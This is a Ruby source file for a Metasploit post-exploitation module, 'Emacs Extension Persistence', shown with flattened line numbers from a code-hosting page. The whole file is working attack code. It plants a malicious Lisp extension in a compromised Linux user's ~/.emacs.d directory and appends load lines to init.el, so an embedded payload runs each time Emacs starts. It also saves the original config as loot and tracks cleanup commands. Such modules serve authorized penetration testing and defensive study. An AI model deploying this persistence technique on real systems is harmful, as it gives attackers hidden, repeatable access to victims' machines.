Path: blob/master/modules/exploits/linux/persistence/emacs_extension.rb
36035 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Exploit::Local::Persistence10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Emacs Extension Persistence',17'Description' => %q{18This module adds a lisp based malicious extension to the emacs configuration file.19When emacs is opened, the extension will be loaded and the payload will be executed.2021Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.22},23'License' => MSF_LICENSE,24'Author' => [25'h00die'26],27'Platform' => [ 'linux' ],28'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],29'SessionTypes' => [ 'meterpreter' ],30'Targets' => [[ 'Auto', {} ]],31'Privileged' => true,32'References' => [33# Leo Laporte [02:39:08]: Plus, as easy as it would be to write a malicious plugin for Emacs, I don't think anybody's going to do that. The pickings are slim, let's put it that way.34[ 'URL', 'https://twit.tv/posts/transcripts/security-now-1061-transcript'],35['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]36],37'DisclosureDate' => '2026-01-28',38'DefaultTarget' => 0,39'Notes' => {40'Stability' => [CRASH_SAFE],41'Reliability' => [REPEATABLE_SESSION],42'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]43}44)45)46register_advanced_options [47OptString.new('NAME', [ false, 'Name of the extension. Defaults to random', '' ]),48OptString.new('CONFIG_FILE', [ false, 'Config file location on target. Defaults to ~/init.el', '' ]),49]5051deregister_options('WritableDir')52end5354def check55return CheckCode::Safe('emacs is required') unless command_exists?('emacs')5657CheckCode::Detected('emacs is installed')58end5960def plugin_name61return datastore['NAME'] unless datastore['NAME'].empty?6263Rex::Text.rand_text_alpha(5..10)64end6566def get_home67return cmd_exec('echo ~').strip68end6970def install_persistence71p_name = plugin_name72vprint_status("Using plugin name: #{p_name}")73emacs_dir = "#{get_home}/.emacs.d"74config_file = datastore['CONFIG_FILE'].empty? ? "#{emacs_dir}/init.el" : datastore['CONFIG_FILE']75lisp_dir = "#{emacs_dir}/lisp"76extension_file = "#{lisp_dir}/#{p_name}.el"7778if file?(config_file)79config_contents = read_file(config_file)80path = store_loot('init.el', 'text/x-common-lisp', session, config_contents, nil, nil)81print_good("Original config file saved in: #{path}")82@clean_up_rc << "upload #{path} #{config_file}\n"83else84print_status("#{config_file} does not exist, creating it")85cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish86write_file(config_file, '')87@clean_up_rc << "rm #{config_file}\n"88end8990unless directory?(lisp_dir)91cmd_exec("mkdir #{lisp_dir}")92@clean_up_rc << "rmdir #{lisp_dir}\n"93end9495fail_with(Failure::UnexpectedReply, "Unable to append to extension to #{config_file}") unless append_file(config_file, "\n(add-to-list 'load-path \"#{lisp_dir}\")\n(require '#{p_name})\n")9697emacs_extension = File.read(File.join(98Msf::Config.data_directory, 'exploits', 'emacs_extension', 'template.el'99))100emacs_extension = emacs_extension.gsub('PAYLOAD_PLACEHOLDER', payload.encoded)101102emacs_extension = emacs_extension.gsub('PLUGIN_NAME', p_name)103fail_with(Failure::UnexpectedReply, "Unable to write extension #{extension_file}") unless write_file(extension_file, emacs_extension)104@clean_up_rc << "rm #{extension_file}\n"105end106end107108109